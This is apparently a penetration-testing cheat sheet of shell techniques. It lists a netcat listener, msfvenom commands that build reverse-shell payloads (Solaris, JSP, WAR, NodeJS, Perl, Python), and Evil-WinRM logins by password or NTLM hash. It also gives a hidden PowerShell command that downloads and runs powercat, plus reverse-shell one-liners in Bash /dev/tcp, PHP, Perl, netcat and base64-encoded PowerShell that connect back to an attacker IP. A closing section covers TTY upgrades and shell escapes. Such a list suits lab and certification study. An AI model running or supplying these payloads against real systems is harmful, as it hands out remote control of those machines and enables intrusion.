Shells
Listener
rlwrap -cAr nc -lnvp <Port Number>
Web Shells
Locate and upload appropriate shells from - /user/share/webshells
Reverse Shells
Refer to https://www.revshells.com/
Reverse Shells (MSFvenom)
NOTE:
shell/reverse_tcp = staged payload
shell_reverse_tcp = unstaged payload
staged payload requires meterpreter listener
Linux
Windows
SunOS (Solaris)
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
Web-based Payloads
PHP
ASP[X]
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw> reverse.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war
NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>
Script Language Payloads
Evil-WinRM
NOTE:
Verify usability with: crackmapexec winrm <Target IP>
Look for port 5985 in nmap scans
evil-winrm -i <Target IP Address> -u <Username> -p <Password>
evil-winrm -i <Target IP Address> -u <Username -H <NTLM Hash>
Powercat.ps1
powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')
powercat -c <Kali IP Address> -p <Kali Port> -e powershell
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py
PHP
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Bash
NOTE: Create a .sh file and paste the following
#!/bin/bash /bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"
Netcat
Linux
nc -nv <Kali IP Address> <Kali Port> -e /bin/bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/sh
nc -nv <Kali IP Address> <Kali Port> -c /bin/bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/sh
Windows
nc64.exe <Kali IP Address> <Kali Port> -e cmd
nc64.exe <Kali IP Address> <Kali Port> -e powershell
nc64.exe <Kali IP Address> <Kali Port> -t -e cmd
nc64.exe <Kali IP Address> <Kali Port> -t -e powershell
PowerShell
Do the following in Kali's pwsh
$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
Create the following python script and run it
import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
TTY Shell
NOTE: Sometime we get a reverse shell and it may not be fully functional. The following commands allow us to spawn proper shell.
Python
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
Bash
echo os.system('/bin/bash')
/bin/sh -i
/bin/bash -i
script -qc /bin/bash /dev/null
Perl
perl -e 'exec "/bin/sh";'
exec "/bin/sh";
Ruby
exec "/bin/sh"
Lua
os.execute('/bin/sh')
IRB
exec "/bin/sh"
Vi
:!bash
:set shell=/bin/bash:shell
Nmap:
!sh
Last updated